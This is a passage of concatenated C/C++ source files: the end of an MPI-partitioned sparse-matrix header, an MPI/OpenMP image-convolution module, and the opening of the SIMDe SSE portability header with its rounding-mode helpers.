printf("src:%d dst:%d\n", tedges2[i].src, tedges2[i].dst);
}
assert(tedges2[i].tile_id != -1);
}
__gnu_parallel::sort(tedges2, tedges2 + new_nnz , compare_tile_id<T>);
int * assignment2 = new int[new_nnz];
#pragma omp parallel for
for(unsigned long i = 0 ; i < new_nnz ; i++)
{
received_edges[i].src = tedges2[i].src;
received_edges[i].dst = tedges2[i].dst;
received_edges[i].val = tedges2[i].val;
assignment2[i] = tedges2[i].tile_id;
}
delete [] tedges2;
for (int tile_j = 0; tile_j < ntiles_x; tile_j++) {
for (int tile_i = 0; tile_i < ntiles_y; tile_i++) {
if (nodeIds[tile_i + tile_j * ntiles_y] == global_myrank) {
int tile_m = start_idy[tile_i + 1] - start_idy[tile_i];
int tile_n = start_idx[tile_j + 1] - start_idx[tile_j];
int this_tile_id = tile_i + tile_j * ntiles_y;
// Find left and right
int start_nz = binary_search_left_border(assignment2, this_tile_id, 0, new_nnz, new_nnz);
int end_nz = binary_search_right_border(assignment2, this_tile_id, 0, new_nnz, new_nnz);
int nnz = 0;
if((start_nz != -1) && (end_nz != -1))
{
nnz = (end_nz+1) - start_nz;
}
if (nnz <= 0) {
tiles[tile_i][tile_j] = new SpTile(tile_m, tile_n);
} else {
tiles[tile_i][tile_j] =
new SpTile(received_edges + start_nz, tile_m, tile_n, nnz, start_idy[tile_i],
start_idx[tile_j]);
}
}
}
}
delete [] assignment2;
delete [] received_edges;
MPI_Barrier(MPI_COMM_WORLD);
}
void Allocate2DPartitioned(int m, int n, int _ntiles_x, int _ntiles_y,
int (*pfn)(int, int, int, int, int)) {
int global_nrank = get_global_nrank();
int global_myrank = get_global_myrank();
ntiles_x = _ntiles_x;
ntiles_y = _ntiles_y;
assert(ntiles_x > 0);
assert(ntiles_y > 0);
this->m = m;
this->n = n;
int vx, vy;
int roundup = 256;
vx = ((((n + ntiles_x - 1) / ntiles_x) + roundup - 1) / roundup) * roundup;
vy = ((((m + ntiles_y - 1) / ntiles_y) + roundup - 1) / roundup) * roundup;
for (int j = 0; j < ntiles_x; j++) {
for (int i = 0; i < ntiles_y; i++) {
nodeIds.push_back(pfn(j, i, ntiles_x, ntiles_y, global_nrank));
}
}
for (int j = 0; j < ntiles_x; j++) {
start_idx.push_back(std::min(vx * j, n));
}
for (int i = 0; i < ntiles_y; i++) {
start_idy.push_back(std::min(vy * i, m));
}
start_idx.push_back(n);
start_idy.push_back(m);
// Allocate space for tiles
for (int tile_i = 0; tile_i < ntiles_y; tile_i++) {
std::vector<SpTile*> tmp;
for (int tile_j = 0; tile_j < ntiles_x; tile_j++) {
tmp.push_back((SpTile*)NULL);
}
tiles.push_back(tmp);
}
}
SpMat() {}
template <typename T>
SpMat(edgelist_t<T> edgelist, int ntx,
int nty, int (*pfn)(int, int, int, int, int)) {
Allocate2DPartitioned(edgelist.m, edgelist.n, ntx, nty, pfn);
ingestEdgelist(edgelist);
}
~SpMat()
{
for(auto it1 = tiles.begin() ; it1 != tiles.end() ; it1++)
{
for(auto it2 = it1->begin() ; it2 != it1->end() ; it2++)
{
delete *it2;
}
}
}
template <typename T>
void get_edges(edgelist_t<T>* edgelist) const {
int global_nrank = get_global_nrank();
int global_myrank = get_global_myrank();
// Get nnz
int nnzs = 0;
for (int i = 0; i < ntiles_y; i++) {
for (int j = 0; j < ntiles_x; j++) {
if (nodeIds[i + j * ntiles_y] == global_myrank) {
nnzs += tiles[i][j]->nnz;
}
}
}
edgelist->m = m;
edgelist->n = n;
edgelist->nnz = nnzs;
if(nnzs > 0)
{
edgelist->edges = reinterpret_cast<edge_t<T>*>(
_mm_malloc((uint64_t)nnzs * (uint64_t)sizeof(edge_t<T>), 64));
nnzs = 0;
for (int i = 0; i < ntiles_y; i++) {
for (int j = 0; j < ntiles_x; j++) {
if (nodeIds[i + j * ntiles_y] == global_myrank) {
tiles[i][j]
->get_edges(edgelist->edges + nnzs, start_idy[i], start_idx[j]);
nnzs += tiles[i][j]->nnz;
}
}
}
}
}
uint64_t getNNZ()
{
int global_myrank = get_global_myrank();
uint64_t total_nnz = 0;
for(int i = 0 ; i < ntiles_y ; i++)
{
for(int j = 0 ; j < ntiles_x ; j++)
{
if(nodeIds[i + j * ntiles_y] == global_myrank)
{
total_nnz += tiles[i][j]->nnz;
}
}
}
// global reduction
MPI_Allreduce(MPI_IN_PLACE, &total_nnz, 1, MPI_UINT64_T, MPI_SUM, MPI_COMM_WORLD); // total_nnz is uint64_t; MPI_INT would truncate the reduction
return total_nnz;
}
};
template <template <typename> class SpTile, typename T>
void get_row_ranks(const SpMat<SpTile<T> >* mat,
std::vector<std::set<int> >* row_ranks_out,
std::vector<std::set<int> >* col_ranks_out) {
for (int i = 0; i < mat->ntiles_y; i++) {
// Create set of row nodeIDs
std::set<int> row_ranks;
for (int j = 0; j < mat->ntiles_x; j++) {
row_ranks.insert(mat->nodeIds[i + j * mat->ntiles_y]);
}
row_ranks_out->push_back(row_ranks);
}
for (int j = 0; j < mat->ntiles_x; j++) {
// Create set of col nodeIDs
std::set<int> col_ranks;
for (int i = 0; i < mat->ntiles_y; i++) {
col_ranks.insert(mat->nodeIds[i + j * mat->ntiles_y]);
}
col_ranks_out->push_back(col_ranks);
}
}
template <template <typename> class SpTile, typename T>
void Transpose(const SpMat<SpTile<T> >* mat, SpMat<SpTile<T> >** matc, int ntx,
int nty, int (*pfn)(int, int, int, int, int)) {
edgelist_t<T> edgelist;
mat->get_edges(&edgelist);
#pragma omp parallel for
for (int i = 0; i < edgelist.nnz; i++) {
int tmp = edgelist.edges[i].src;
edgelist.edges[i].src = edgelist.edges[i].dst;
edgelist.edges[i].dst = tmp;
}
int tmp = edgelist.m;
edgelist.m = edgelist.n;
edgelist.n = tmp;
(*matc) = new SpMat<SpTile<T> >(edgelist, ntx, nty, pfn);
if(edgelist.nnz > 0)
{
_mm_free(edgelist.edges);
}
}
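/* Usage sketch (illustrative only; the tile type and a populated edge list
 * are assumed to come from the rest of GMDP). A partition function maps a
 * (tile_x, tile_y) coordinate to an owning MPI rank, e.g. a cyclic one:
 *
 *   static int cyclic_partition(int tx, int ty, int ntx, int nty, int nrank) {
 *     return (ty + tx * nty) % nrank;  // hand tiles out round-robin
 *   }
 *
 *   edgelist_t<float> el;  // filled elsewhere
 *   SpMat<SomeTile<float> > A(el, 2, 2, cyclic_partition);  // 2x2 tile grid
 */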
#endif // SRC_SPMAT_H_
|
mpi_omp_functions.c | #include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <limits.h>
#include <mpi.h>
#include <omp.h>
#include "mpi_omp_functions.h"
/* Read command line arguments from the user and store them in a struct */
void ParseInput(int argc, char **argv, inputArguments *input) {
int i;
if (argc == 11) {
for (i = 1 ; i < argc ; i++) {
if (!strcmp(argv[i], "-i")) { // If flag is -i ..
strcpy(input->imageNameInput, argv[++i]);
sprintf(input->imageNameOutput, "Filtered_%s", argv[i]);
continue;
}
if (!strcmp(argv[i], "-h")) { // If flag is -h ..
input->height = atoi(argv[++i]);
continue;
}
if (!strcmp(argv[i], "-w")) { // If flag is -w ..
input->width = atoi(argv[++i]);
continue;
}
if (!strcmp(argv[i], "-l")) { // If flag is -l ..
input->iterations = atoi(argv[++i]);
continue;
}
if (!strcmp(argv[i], "-t")) { // If flag is -t ..
if (!strcmp(argv[++i], "GREY"))
input->imageType = GREY;
else if (!strcmp(argv[i], "RGB"))
input->imageType = RGB;
else {
fprintf(stderr, "Input error: wrong image type\n");
MPI_Abort(MPI_COMM_WORLD, EXIT_FAILURE);
exit(EXIT_FAILURE);
}
continue;
}
}
}
else {
fprintf(stderr, "Input error: wrong number of command line arguments\n");
MPI_Abort(MPI_COMM_WORLD, EXIT_FAILURE);
exit(EXIT_FAILURE);
}
}
/* Find an image split that balances the computational load across processes */
void splitImageToBlocks(int height, int width, int numProcesses, int *splitRows, int *splitCols) {
int rowNumber, colNumber, blockSize, blockSizeMin = INT_MAX;
for (rowNumber = 1 ; rowNumber <= numProcesses ; rowNumber++) {
if ((height%rowNumber == 0) && (numProcesses%rowNumber == 0))
colNumber = numProcesses / rowNumber;
else
continue;
if (width%colNumber == 0)
blockSize = height/rowNumber + width/colNumber;
else
continue;
if (blockSize < blockSizeMin) {
blockSizeMin = blockSize;
*splitRows = rowNumber;
*splitCols = colNumber;
}
}
}
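/* Worked example: for a 100x100 image on 4 processes the candidate grids are
 * 1x4 (blockSize 100 + 25 = 125), 2x2 (50 + 50 = 100) and 4x1 (25 + 100 = 125),
 * so the 2x2 split wins: it minimizes the per-block halo perimeter. */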
/* Apply filter through convolution on GREY images */
void convoluteGREY(uint8_t *source, uint8_t *destination, float **filter, int width, int rowStart, int colStart, int rowEnd, int colEnd) {
int i, j;
#pragma omp parallel for shared(source, destination) schedule(static) collapse(2)
for (i = rowStart ; i <= rowEnd ; i++) {
for (j = colStart ; j <= colEnd ; j++) {
innerConvoluteGREY(source, destination, filter, width, i, j);
}
}
}
void innerConvoluteGREY(uint8_t *source, uint8_t *destination, float **filter, int width, int i, int j) {
int x, y;
float sum = 0; // accumulate in float; an int accumulator would truncate every weighted term
for (x = (i-1) ; x <= (i+1) ; x++) {
for (y = (j-1) ; y <= (j+1) ; y++) {
sum += source[x*width + y] * filter[x-(i-1)][y-(j-1)];
}
}
destination[i*width + j] = (uint8_t)sum;
}
/* Apply filter through convolution on RGB images */
void convoluteRGB(uint8_t *source, uint8_t *destination, float **filter, int width, int rowStart, int colStart, int rowEnd, int colEnd) {
int i, j;
#pragma omp parallel for shared(source, destination) schedule(static) collapse(2)
for (i = rowStart ; i <= rowEnd ; i++) {
for (j = colStart ; j <= colEnd ; j++) {
innerConvoluteRGB(source, destination, filter, width, i, j);
}
}
}
void innerConvoluteRGB(uint8_t *source, uint8_t *destination, float **filter, int width, int i, int j) {
int x, y;
float sumR = 0, sumG = 0, sumB = 0; // accumulate each channel in float to avoid per-term truncation
for (x = (i-1) ; x <= (i+1) ; x++) {
for (y = (3*(j-1)) ; y <= (3*(j+1)) ; y+=3) {
sumR += source[x*width + y] * filter[x-(i-1)][(y-(3*(j-1)))/3];
sumG += source[x*width + y+1] * filter[x-(i-1)][(y-(3*(j-1)))/3];
sumB += source[x*width + y+2] * filter[x-(i-1)][(y-(3*(j-1)))/3];
}
}
destination[i*width + 3*j] = (uint8_t)sumR;
destination[i*width + 3*j+1] = (uint8_t)sumG;
destination[i*width + 3*j+2] = (uint8_t)sumB;
}
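/* Usage sketch (hypothetical buffers and sizes): apply a normalized 3x3 blur
 * kernel to the interior of a greyscale block. The bounds leave a one-pixel
 * halo so innerConvoluteGREY never reads outside the buffer.
 *
 *   float blurTop[3] = {1/16.0f, 2/16.0f, 1/16.0f};
 *   float blurMid[3] = {2/16.0f, 4/16.0f, 2/16.0f};
 *   float *blur[3]   = {blurTop, blurMid, blurTop};
 *   convoluteGREY(src, dst, blur, width, 1, 1, height - 2, width - 2);
 */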
|
sse.h | /* SPDX-License-Identifier: MIT
*
* Permission is hereby granted, free of charge, to any person
* obtaining a copy of this software and associated documentation
* files (the "Software"), to deal in the Software without
* restriction, including without limitation the rights to use, copy,
* modify, merge, publish, distribute, sublicense, and/or sell copies
* of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be
* included in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
* EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
* MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
* NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
* BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
* ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*
* Copyright:
* 2017-2020 Evan Nemerson <evan@nemerson.com>
* 2015-2017 John W. Ratcliff <jratcliffscarab@gmail.com>
* 2015 Brandon Rowlett <browlett@nvidia.com>
* 2015 Ken Fast <kfast@gdeb.com>
*/
#if !defined(SIMDE_X86_SSE_H)
#define SIMDE_X86_SSE_H
#include "mmx.h"
#if defined(_WIN32)
#include <windows.h>
#endif
HEDLEY_DIAGNOSTIC_PUSH
SIMDE_DISABLE_UNWANTED_DIAGNOSTICS
SIMDE_BEGIN_DECLS_
typedef union {
#if defined(SIMDE_VECTOR_SUBSCRIPT)
SIMDE_ALIGN_TO_16 int8_t i8 SIMDE_VECTOR(16) SIMDE_MAY_ALIAS;
SIMDE_ALIGN_TO_16 int16_t i16 SIMDE_VECTOR(16) SIMDE_MAY_ALIAS;
SIMDE_ALIGN_TO_16 int32_t i32 SIMDE_VECTOR(16) SIMDE_MAY_ALIAS;
SIMDE_ALIGN_TO_16 int64_t i64 SIMDE_VECTOR(16) SIMDE_MAY_ALIAS;
SIMDE_ALIGN_TO_16 uint8_t u8 SIMDE_VECTOR(16) SIMDE_MAY_ALIAS;
SIMDE_ALIGN_TO_16 uint16_t u16 SIMDE_VECTOR(16) SIMDE_MAY_ALIAS;
SIMDE_ALIGN_TO_16 uint32_t u32 SIMDE_VECTOR(16) SIMDE_MAY_ALIAS;
SIMDE_ALIGN_TO_16 uint64_t u64 SIMDE_VECTOR(16) SIMDE_MAY_ALIAS;
#if defined(SIMDE_HAVE_INT128_)
SIMDE_ALIGN_TO_16 simde_int128 i128 SIMDE_VECTOR(16) SIMDE_MAY_ALIAS;
SIMDE_ALIGN_TO_16 simde_uint128 u128 SIMDE_VECTOR(16) SIMDE_MAY_ALIAS;
#endif
SIMDE_ALIGN_TO_16 simde_float32 f32 SIMDE_VECTOR(16) SIMDE_MAY_ALIAS;
SIMDE_ALIGN_TO_16 int_fast32_t i32f SIMDE_VECTOR(16) SIMDE_MAY_ALIAS;
SIMDE_ALIGN_TO_16 uint_fast32_t u32f SIMDE_VECTOR(16) SIMDE_MAY_ALIAS;
#else
SIMDE_ALIGN_TO_16 int8_t i8[16];
SIMDE_ALIGN_TO_16 int16_t i16[8];
SIMDE_ALIGN_TO_16 int32_t i32[4];
SIMDE_ALIGN_TO_16 int64_t i64[2];
SIMDE_ALIGN_TO_16 uint8_t u8[16];
SIMDE_ALIGN_TO_16 uint16_t u16[8];
SIMDE_ALIGN_TO_16 uint32_t u32[4];
SIMDE_ALIGN_TO_16 uint64_t u64[2];
#if defined(SIMDE_HAVE_INT128_)
SIMDE_ALIGN_TO_16 simde_int128 i128[1];
SIMDE_ALIGN_TO_16 simde_uint128 u128[1];
#endif
SIMDE_ALIGN_TO_16 simde_float32 f32[4];
SIMDE_ALIGN_TO_16 int_fast32_t i32f[16 / sizeof(int_fast32_t)];
SIMDE_ALIGN_TO_16 uint_fast32_t u32f[16 / sizeof(uint_fast32_t)];
#endif
SIMDE_ALIGN_TO_16 simde__m64_private m64_private[2];
SIMDE_ALIGN_TO_16 simde__m64 m64[2];
#if defined(SIMDE_X86_SSE_NATIVE)
SIMDE_ALIGN_TO_16 __m128 n;
#elif defined(SIMDE_ARM_NEON_A32V7_NATIVE)
SIMDE_ALIGN_TO_16 int8x16_t neon_i8;
SIMDE_ALIGN_TO_16 int16x8_t neon_i16;
SIMDE_ALIGN_TO_16 int32x4_t neon_i32;
SIMDE_ALIGN_TO_16 int64x2_t neon_i64;
SIMDE_ALIGN_TO_16 uint8x16_t neon_u8;
SIMDE_ALIGN_TO_16 uint16x8_t neon_u16;
SIMDE_ALIGN_TO_16 uint32x4_t neon_u32;
SIMDE_ALIGN_TO_16 uint64x2_t neon_u64;
SIMDE_ALIGN_TO_16 float32x4_t neon_f32;
#if defined(SIMDE_ARM_NEON_A64V8_NATIVE)
SIMDE_ALIGN_TO_16 float64x2_t neon_f64;
#endif
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
SIMDE_ALIGN_TO_16 v128_t wasm_v128;
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
SIMDE_ALIGN_TO_16 SIMDE_POWER_ALTIVEC_VECTOR(unsigned char) altivec_u8;
SIMDE_ALIGN_TO_16
SIMDE_POWER_ALTIVEC_VECTOR(unsigned short) altivec_u16;
SIMDE_ALIGN_TO_16 SIMDE_POWER_ALTIVEC_VECTOR(unsigned int) altivec_u32;
SIMDE_ALIGN_TO_16 SIMDE_POWER_ALTIVEC_VECTOR(signed char) altivec_i8;
SIMDE_ALIGN_TO_16 SIMDE_POWER_ALTIVEC_VECTOR(signed short) altivec_i16;
SIMDE_ALIGN_TO_16 SIMDE_POWER_ALTIVEC_VECTOR(signed int) altivec_i32;
SIMDE_ALIGN_TO_16 SIMDE_POWER_ALTIVEC_VECTOR(float) altivec_f32;
#if defined(SIMDE_POWER_ALTIVEC_P7_NATIVE)
SIMDE_ALIGN_TO_16
SIMDE_POWER_ALTIVEC_VECTOR(unsigned long long) altivec_u64;
SIMDE_ALIGN_TO_16
SIMDE_POWER_ALTIVEC_VECTOR(signed long long) altivec_i64;
SIMDE_ALIGN_TO_16 SIMDE_POWER_ALTIVEC_VECTOR(double) altivec_f64;
#endif
#endif
} simde__m128_private;
#if defined(SIMDE_X86_SSE_NATIVE)
typedef __m128 simde__m128;
#elif defined(SIMDE_ARM_NEON_A32V7_NATIVE)
typedef float32x4_t simde__m128;
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
typedef v128_t simde__m128;
#elif defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
typedef SIMDE_POWER_ALTIVEC_VECTOR(float) simde__m128;
#elif defined(SIMDE_VECTOR_SUBSCRIPT)
typedef simde_float32
simde__m128 SIMDE_ALIGN_TO_16 SIMDE_VECTOR(16) SIMDE_MAY_ALIAS;
#else
typedef simde__m128_private simde__m128;
#endif
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
typedef simde__m128 __m128;
#endif
HEDLEY_STATIC_ASSERT(16 == sizeof(simde__m128), "simde__m128 size incorrect");
HEDLEY_STATIC_ASSERT(16 == sizeof(simde__m128_private),
"simde__m128_private size incorrect");
#if defined(SIMDE_CHECK_ALIGNMENT) && defined(SIMDE_ALIGN_OF)
HEDLEY_STATIC_ASSERT(SIMDE_ALIGN_OF(simde__m128) == 16,
"simde__m128 is not 16-byte aligned");
HEDLEY_STATIC_ASSERT(SIMDE_ALIGN_OF(simde__m128_private) == 16,
"simde__m128_private is not 16-byte aligned");
#endif
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde__m128_from_private(simde__m128_private v)
{
simde__m128 r;
simde_memcpy(&r, &v, sizeof(r));
return r;
}
SIMDE_FUNCTION_ATTRIBUTES
simde__m128_private simde__m128_to_private(simde__m128 v)
{
simde__m128_private r;
simde_memcpy(&r, &v, sizeof(r));
return r;
}
#if defined(SIMDE_ARM_NEON_A32V7_NATIVE)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(m128, int8x16_t, neon, i8)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(m128, int16x8_t, neon, i16)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(m128, int32x4_t, neon, i32)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(m128, int64x2_t, neon, i64)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(m128, uint8x16_t, neon, u8)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(m128, uint16x8_t, neon, u16)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(m128, uint32x4_t, neon, u32)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(m128, uint64x2_t, neon, u64)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(m128, float32x4_t, neon, f32)
#if defined(SIMDE_ARM_NEON_A64V8_NATIVE)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(m128, float64x2_t, neon, f64)
#endif
#endif /* defined(SIMDE_ARM_NEON_A32V7_NATIVE) */
#if defined(SIMDE_POWER_ALTIVEC_P6_NATIVE)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(m128,
SIMDE_POWER_ALTIVEC_VECTOR(signed char),
altivec, i8)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(m128,
SIMDE_POWER_ALTIVEC_VECTOR(signed short),
altivec, i16)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(m128,
SIMDE_POWER_ALTIVEC_VECTOR(signed int),
altivec, i32)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(
m128, SIMDE_POWER_ALTIVEC_VECTOR(unsigned char), altivec, u8)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(
m128, SIMDE_POWER_ALTIVEC_VECTOR(unsigned short), altivec, u16)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(m128,
SIMDE_POWER_ALTIVEC_VECTOR(unsigned int),
altivec, u32)
#if defined(SIMDE_BUG_GCC_95782)
SIMDE_FUNCTION_ATTRIBUTES
SIMDE_POWER_ALTIVEC_VECTOR(float)
simde__m128_to_altivec_f32(simde__m128 value)
{
simde__m128_private r_ = simde__m128_to_private(value);
return r_.altivec_f32;
}
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde__m128_from_altivec_f32(SIMDE_POWER_ALTIVEC_VECTOR(float)
value)
{
simde__m128_private r_;
r_.altivec_f32 = value;
return simde__m128_from_private(r_);
}
#else
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(m128, SIMDE_POWER_ALTIVEC_VECTOR(float),
altivec, f32)
#endif
#if defined(SIMDE_POWER_ALTIVEC_P7_NATIVE)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(
m128, SIMDE_POWER_ALTIVEC_VECTOR(signed long long), altivec, i64)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(
m128, SIMDE_POWER_ALTIVEC_VECTOR(unsigned long long), altivec, u64)
#endif
#elif defined(SIMDE_WASM_SIMD128_NATIVE)
SIMDE_X86_GENERATE_CONVERSION_FUNCTION(m128, v128_t, wasm, v128);
#endif /* defined(SIMDE_POWER_ALTIVEC_P6_NATIVE) */
enum {
#if defined(SIMDE_X86_SSE_NATIVE)
SIMDE_MM_ROUND_NEAREST = _MM_ROUND_NEAREST,
SIMDE_MM_ROUND_DOWN = _MM_ROUND_DOWN,
SIMDE_MM_ROUND_UP = _MM_ROUND_UP,
SIMDE_MM_ROUND_TOWARD_ZERO = _MM_ROUND_TOWARD_ZERO
#else
SIMDE_MM_ROUND_NEAREST = 0x0000,
SIMDE_MM_ROUND_DOWN = 0x2000,
SIMDE_MM_ROUND_UP = 0x4000,
SIMDE_MM_ROUND_TOWARD_ZERO = 0x6000
#endif
};
#if defined(_MM_FROUND_TO_NEAREST_INT)
#define SIMDE_MM_FROUND_TO_NEAREST_INT _MM_FROUND_TO_NEAREST_INT
#define SIMDE_MM_FROUND_TO_NEG_INF _MM_FROUND_TO_NEG_INF
#define SIMDE_MM_FROUND_TO_POS_INF _MM_FROUND_TO_POS_INF
#define SIMDE_MM_FROUND_TO_ZERO _MM_FROUND_TO_ZERO
#define SIMDE_MM_FROUND_CUR_DIRECTION _MM_FROUND_CUR_DIRECTION
#define SIMDE_MM_FROUND_RAISE_EXC _MM_FROUND_RAISE_EXC
#define SIMDE_MM_FROUND_NO_EXC _MM_FROUND_NO_EXC
#else
#define SIMDE_MM_FROUND_TO_NEAREST_INT 0x00
#define SIMDE_MM_FROUND_TO_NEG_INF 0x01
#define SIMDE_MM_FROUND_TO_POS_INF 0x02
#define SIMDE_MM_FROUND_TO_ZERO 0x03
#define SIMDE_MM_FROUND_CUR_DIRECTION 0x04
#define SIMDE_MM_FROUND_RAISE_EXC 0x00
#define SIMDE_MM_FROUND_NO_EXC 0x08
#endif
#define SIMDE_MM_FROUND_NINT \
(SIMDE_MM_FROUND_TO_NEAREST_INT | SIMDE_MM_FROUND_RAISE_EXC)
#define SIMDE_MM_FROUND_FLOOR \
(SIMDE_MM_FROUND_TO_NEG_INF | SIMDE_MM_FROUND_RAISE_EXC)
#define SIMDE_MM_FROUND_CEIL \
(SIMDE_MM_FROUND_TO_POS_INF | SIMDE_MM_FROUND_RAISE_EXC)
#define SIMDE_MM_FROUND_TRUNC \
(SIMDE_MM_FROUND_TO_ZERO | SIMDE_MM_FROUND_RAISE_EXC)
#define SIMDE_MM_FROUND_RINT \
(SIMDE_MM_FROUND_CUR_DIRECTION | SIMDE_MM_FROUND_RAISE_EXC)
#define SIMDE_MM_FROUND_NEARBYINT \
(SIMDE_MM_FROUND_CUR_DIRECTION | SIMDE_MM_FROUND_NO_EXC)
#if defined(SIMDE_X86_SSE4_1_ENABLE_NATIVE_ALIASES) && \
!defined(_MM_FROUND_TO_NEAREST_INT)
#define _MM_FROUND_TO_NEAREST_INT SIMDE_MM_FROUND_TO_NEAREST_INT
#define _MM_FROUND_TO_NEG_INF SIMDE_MM_FROUND_TO_NEG_INF
#define _MM_FROUND_TO_POS_INF SIMDE_MM_FROUND_TO_POS_INF
#define _MM_FROUND_TO_ZERO SIMDE_MM_FROUND_TO_ZERO
#define _MM_FROUND_CUR_DIRECTION SIMDE_MM_FROUND_CUR_DIRECTION
#define _MM_FROUND_RAISE_EXC SIMDE_MM_FROUND_RAISE_EXC
#define _MM_FROUND_NINT SIMDE_MM_FROUND_NINT
#define _MM_FROUND_FLOOR SIMDE_MM_FROUND_FLOOR
#define _MM_FROUND_CEIL SIMDE_MM_FROUND_CEIL
#define _MM_FROUND_TRUNC SIMDE_MM_FROUND_TRUNC
#define _MM_FROUND_RINT SIMDE_MM_FROUND_RINT
#define _MM_FROUND_NEARBYINT SIMDE_MM_FROUND_NEARBYINT
#endif
SIMDE_FUNCTION_ATTRIBUTES
unsigned int SIMDE_MM_GET_ROUNDING_MODE(void)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _MM_GET_ROUNDING_MODE();
#elif defined(SIMDE_HAVE_FENV_H)
unsigned int vfe_mode;
switch (fegetround()) {
#if defined(FE_TONEAREST)
case FE_TONEAREST:
vfe_mode = SIMDE_MM_ROUND_NEAREST;
break;
#endif
#if defined(FE_TOWARDZERO)
case FE_TOWARDZERO:
vfe_mode = SIMDE_MM_ROUND_TOWARD_ZERO; /* FE_TOWARDZERO is truncation; matches SIMDE_MM_SET_ROUNDING_MODE below */
break;
#endif
#if defined(FE_UPWARD)
case FE_UPWARD:
vfe_mode = SIMDE_MM_ROUND_UP;
break;
#endif
#if defined(FE_DOWNWARD)
case FE_DOWNWARD:
vfe_mode = SIMDE_MM_ROUND_DOWN; /* FE_DOWNWARD rounds toward negative infinity */
break;
#endif
default:
vfe_mode = SIMDE_MM_ROUND_NEAREST;
break;
}
return vfe_mode;
#else
return SIMDE_MM_ROUND_NEAREST;
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _MM_GET_ROUNDING_MODE() SIMDE_MM_GET_ROUNDING_MODE()
#endif
SIMDE_FUNCTION_ATTRIBUTES
void SIMDE_MM_SET_ROUNDING_MODE(unsigned int a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
_MM_SET_ROUNDING_MODE(a);
#elif defined(SIMDE_HAVE_FENV_H)
int fe_mode = FE_TONEAREST;
switch (a) {
#if defined(FE_TONEAREST)
case SIMDE_MM_ROUND_NEAREST:
fe_mode = FE_TONEAREST;
break;
#endif
#if defined(FE_TOWARDZERO)
case SIMDE_MM_ROUND_TOWARD_ZERO:
fe_mode = FE_TOWARDZERO;
break;
#endif
#if defined(FE_DOWNWARD)
case SIMDE_MM_ROUND_DOWN:
fe_mode = FE_DOWNWARD;
break;
#endif
#if defined(FE_UPWARD)
case SIMDE_MM_ROUND_UP:
fe_mode = FE_UPWARD;
break;
#endif
default:
return;
}
fesetround(fe_mode);
#else
(void)a;
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _MM_SET_ROUNDING_MODE(a) SIMDE_MM_SET_ROUNDING_MODE(a)
#endif
SIMDE_FUNCTION_ATTRIBUTES
uint32_t simde_mm_getcsr(void)
{
#if defined(SIMDE_X86_SSE_NATIVE)
return _mm_getcsr();
#else
return SIMDE_MM_GET_ROUNDING_MODE();
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_getcsr() simde_mm_getcsr()
#endif
SIMDE_FUNCTION_ATTRIBUTES
void simde_mm_setcsr(uint32_t a)
{
#if defined(SIMDE_X86_SSE_NATIVE)
_mm_setcsr(a);
#else
SIMDE_MM_SET_ROUNDING_MODE(HEDLEY_STATIC_CAST(unsigned int, a));
#endif
}
#if defined(SIMDE_X86_SSE_ENABLE_NATIVE_ALIASES)
#define _mm_setcsr(a) simde_mm_setcsr(a)
#endif
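/* Usage sketch: save the current rounding mode, switch to truncation for a
 * rounding-sensitive region, then restore it:
 *
 *   unsigned int saved = SIMDE_MM_GET_ROUNDING_MODE();
 *   SIMDE_MM_SET_ROUNDING_MODE(SIMDE_MM_ROUND_TOWARD_ZERO);
 *   ... code that relies on round-toward-zero ...
 *   SIMDE_MM_SET_ROUNDING_MODE(saved);
 */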
SIMDE_FUNCTION_ATTRIBUTES
simde__m128 simde_x_mm_round_ps(simde__m128 a, int rounding, int lax_rounding)
SIMDE_REQUIRE_CONSTANT_RANGE(rounding, 0, 15)
SIMDE_REQUIRE_CONSTANT_RANGE(lax_rounding, 0, 1)
{
simde__m128_private r_, a_ = simde__m128_to_private(a);
(void)lax_rounding;
/* For architectures which lack a current direction SIMD instruction.
*
* Note that NEON actually has a current rounding mode instruction,
* but in ARMv8+ the rounding mode is ignored and nearest is always
* used, so we treat ARMv7 as having a rounding mode but ARMv8 as
* not. */
